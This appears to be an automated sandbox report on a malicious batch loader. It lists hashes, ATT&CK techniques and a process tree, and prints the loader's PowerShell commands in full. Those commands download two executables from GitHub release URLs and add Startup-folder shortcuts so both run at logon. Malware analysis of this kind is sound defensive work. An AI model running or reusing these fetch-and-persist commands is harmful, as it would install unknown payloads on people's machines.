412476007cd57ca529c83c386125249fbe0952a2522f5d838ffd3fb10a6e1f74

General

Target

OTEYZ_Loader.bat
Size

1KB
MD5

f3f83ae17a3f81e0265b9ce7e480bd4e
SHA1

994d8d5b533fd09630b45a0d0404f65557e83d5d
SHA256

412476007cd57ca529c83c386125249fbe0952a2522f5d838ffd3fb10a6e1f74
SHA512

cc0480e5cf4b8d6ca9318f806587bf121dc8feb553263e4756b43b568cf38d93ce94a467e87878f299d3fdabc66e178c8dafa96e3e5fda51bbfd7a6b4220bf39

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
2084	powershell.exe
2788	powershell.exe
2500	powershell.exe
2076	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Loader.lnk	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\output.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2084	powershell.exe
2500	powershell.exe
2788	powershell.exe
2076	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2084	powershell.exe
Token: SeDebugPrivilege	2500	powershell.exe
Token: SeDebugPrivilege	2788	powershell.exe
Token: SeDebugPrivilege	2076	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2340 wrote to memory of 2084	2340	cmd.exe	31
PID 2340 wrote to memory of 2084	2340	cmd.exe	31
PID 2340 wrote to memory of 2084	2340	cmd.exe	31
PID 2340 wrote to memory of 2500	2340	cmd.exe	32
PID 2340 wrote to memory of 2500	2340	cmd.exe	32
PID 2340 wrote to memory of 2500	2340	cmd.exe	32
PID 2340 wrote to memory of 2788	2340	cmd.exe	33
PID 2340 wrote to memory of 2788	2340	cmd.exe	33
PID 2340 wrote to memory of 2788	2340	cmd.exe	33
PID 2340 wrote to memory of 2076	2340	cmd.exe	34
PID 2340 wrote to memory of 2076	2340	cmd.exe	34
PID 2340 wrote to memory of 2076	2340	cmd.exe	34

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\OTEYZ_Loader.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2340
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Invoke-WebRequest -Uri https://github.com/Realmastercoder69/DD/releases/download/D/output.exe -OutFile C:\Users\Admin\Desktop\output.exe -ErrorAction SilentlyContinue"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2084
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$WScriptShell = New-Object -ComObject WScript.Shell; $shortcut1 = $WScriptShell.CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\output.lnk'); $shortcut1.TargetPath = 'C:\Users\Admin\Desktop\output.exe'; $shortcut1.Save()"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops startup file
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2500
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Invoke-WebRequest -Uri https://github.com/Realmastercoder69/uu/releases/download/dss/Loader.exe -OutFile C:\Users\Admin\Desktop\Loader.exe -ErrorAction SilentlyContinue"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2788
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$WScriptShell = New-Object -ComObject WScript.Shell; $shortcut2 = $WScriptShell.CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Loader.lnk'); $shortcut2.TargetPath = 'C:\Users\Admin\Desktop\Loader.exe'; $shortcut2.Save()"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops startup file
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2076

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
95cfc4efd65de9023030f1b4e2e6b454

SHA1
1ac8b770fcfaebe36ab3fb7f71587ffe757ca7f3

SHA256
ee63e7c21fb207d8ffbc81c95efe3e539af96f7dafdc5dafd36bbbd0a13c554c

SHA512
16caaf2ae0bc538e9a56cca7051ab2f313b3f340c6604f14265d8f8a098146b47e1b92f21ea4b97f2ac06277edf86898ffcbe5e3ea3e6098b2731b6f0ce0ed8a

Download Submit
memory/2084-6-0x00000000023C0000-0x00000000023C8000-memory.dmp

Filesize
32KB

Download
memory/2084-4-0x000007FEF5BFE000-0x000007FEF5BFF000-memory.dmp

Filesize
4KB

Download
memory/2084-9-0x000007FEF5940000-0x000007FEF62DD000-memory.dmp

Filesize
9.6MB

Download
memory/2084-10-0x000007FEF5940000-0x000007FEF62DD000-memory.dmp

Filesize
9.6MB

Download
memory/2084-8-0x000007FEF5940000-0x000007FEF62DD000-memory.dmp

Filesize
9.6MB

Download
memory/2084-11-0x000007FEF5940000-0x000007FEF62DD000-memory.dmp

Filesize
9.6MB

Download
memory/2084-12-0x000007FEF5940000-0x000007FEF62DD000-memory.dmp

Filesize
9.6MB

Download
memory/2084-7-0x000007FEF5940000-0x000007FEF62DD000-memory.dmp

Filesize
9.6MB

Download
memory/2084-5-0x000000001B580000-0x000000001B862000-memory.dmp

Filesize
2.9MB

Download
memory/2500-18-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

Filesize
2.9MB

Download
memory/2500-19-0x00000000002F0000-0x00000000002F8000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing